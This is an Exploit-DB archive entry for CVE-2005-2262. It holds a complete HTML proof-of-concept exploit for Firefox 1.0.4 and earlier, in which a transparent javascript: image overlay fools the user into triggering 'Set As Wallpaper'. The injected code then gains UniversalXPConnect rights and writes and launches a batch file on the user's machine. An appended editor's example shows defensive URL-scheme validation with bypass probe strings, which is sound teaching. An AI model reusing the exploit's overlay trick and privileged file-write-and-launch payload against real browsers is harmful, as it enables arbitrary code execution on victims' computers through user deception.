Mozilla Firefox <= 1.0.4 - "Set As Wallpaper" Code Execution Exploit

2005-07-13T00:00:00
ID EDB-ID:1102
Type exploitdb
Reporter Michael Krax
Modified 2005-07-13T00:00:00

Description

Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit. CVE-2005-2262. Remote exploit for the Windows platform.

                                        
// Exploit by Michael Krax
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firewalling - Proof-of-Concept</title>
<script>
function stopload() {
// in some cases the javascript: url never stops loading,
// therefore we force a stop after the real image has loaded
window.setTimeout("window.stop()",1000);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">

<div style="font-family:Verdana;font-size:15px;font-weight:bold;">
Firewalling - Proof-of-Concept</div>
<div style="width:600px">
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows executing javascript in chrome and running arbitrary code.
<br><br>
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user into thinking he is setting a valid image as wallpaper.
<br><br>
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file,
which shows a directory listing in a DOS box (Windows only).
<br><br>

<!-- Overlay trick: the fully transparent javascript: image (z-index 2) sits exactly on top
     of the real logo (z-index 1), so the right-click lands on the javascript: URL while the
     user only sees the logo. The payload checks that it is running from a chrome: document
     (the wallpaper dialog) before requesting UniversalXPConnect and writing/launching the
     batch file; in the content page it does nothing. -->
<div style="position:relative; width:300px; height:250px;">
<img src="javascript:/*-----------------------------*/eval('if(document.location.href.
substr(0,6)==\'chrome\'){netscape.security.PrivilegeManager.enablePrivilege(\'
UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'c:\\\\
booom.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;
1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE
\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch
();}else{void(0)}')" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;">
<img src="http://www.milw0rm.com/images/logo.png" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:1;" onload="stopload()">
</div>
</div>
</body>

</html>

# milw0rm.com [2005-07-13]
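The root cause stated in the PoC is that the chrome-side "Set As Wallpaper" handler accepts the image URL without checking it. The following is an added example written by the editor, not code from Michael Krax's exploit or from Firefox: it contrasts a naive deny-list check with a normalize-then-allow-list check, run over the PoC's own img src and a few constructed variants. The allowed scheme set and the normalization rules are this example's assumptions; the normalization approximates the way browsers drop tab/CR/LF from a URL before parsing, which is why the javascript: URL in the PoC still executes although it is broken across lines.

```javascript
// Added example (editor's code, not part of the PoC above or of Firefox).
// Shows why a URL reaching a privileged handler must be validated by scheme
// after normalization, and how a literal-prefix deny-list is bypassed.
"use strict";

// Constructed sample: the PoC's img src as it appears above, with its line
// break kept, and the XPCOM file-write/launch body shortened to a comment.
const POC_SRC =
  "javascript:/*-----------------------------*/eval('if(document.location.href.\n" +
  "substr(0,6)==\\'chrome\\'){/* nsILocalFile write + launch */}else{void(0)}')";

// Naive deny-list check: only a literal, lowercase "javascript:" prefix is refused.
function naiveImageUrlCheck(url) {
  return !url.startsWith("javascript:");
}

// Extract the scheme the way a URL parser would see it (assumed normalization):
// drop embedded tab/CR/LF, strip leading control characters and spaces, then
// match the scheme token case-insensitively.
function extractScheme(url) {
  const cleaned = url.replace(/[\t\r\n]/g, "").replace(/^[\x00-\x20]+/, "");
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Allow-list of schemes a wallpaper image may be fetched from (assumption).
// A URL with no scheme is refused too: by the time a privileged handler sees
// the src it has been resolved to an absolute URL, so a missing scheme is
// not a URL this check should trust.
const ALLOWED_IMAGE_SCHEMES = new Set(["http", "https"]);

function hardenedImageUrlCheck(url) {
  const scheme = extractScheme(url);
  return scheme !== null && ALLOWED_IMAGE_SCHEMES.has(scheme);
}

// Constructed probes: one legitimate image URL and five that must be refused.
const SAMPLES = [
  { url: "http://www.milw0rm.com/images/logo.png", shouldAllow: true },
  { url: POC_SRC, shouldAllow: false },
  { url: "JaVaScRiPt:alert(1)", shouldAllow: false },     // case variant
  { url: " \tjavascript:alert(1)", shouldAllow: false },  // leading whitespace
  { url: "java\nscript:alert(1)", shouldAllow: false },   // newline inside the scheme
  { url: "data:text/html,<script>alert(1)</script>", shouldAllow: false },
];

// Sample URLs a check lets through although they should be refused.
function bypassesOf(check) {
  return SAMPLES.filter(s => !s.shouldAllow && check(s.url)).map(s => s.url);
}

// Sample URLs a check refuses although they are legitimate.
function falseRejectsOf(check) {
  return SAMPLES.filter(s => s.shouldAllow && !check(s.url)).map(s => s.url);
}

for (const [name, check] of [["naive", naiveImageUrlCheck], ["hardened", hardenedImageUrlCheck]]) {
  console.log(`${name}: ${bypassesOf(check).length} bypasses, ${falseRejectsOf(check).length} false rejects`);
}
```

The naive check refuses the PoC's exact src but is bypassed by a case variant, by leading whitespace, by a newline inside the scheme and by a data: URL; the allow-list check refuses all five and still accepts the legitimate logo URL. The point for the privileged side is the same as in the PoC: the only safe input to a chrome-context loader is a URL whose normalized scheme is one the handler expects.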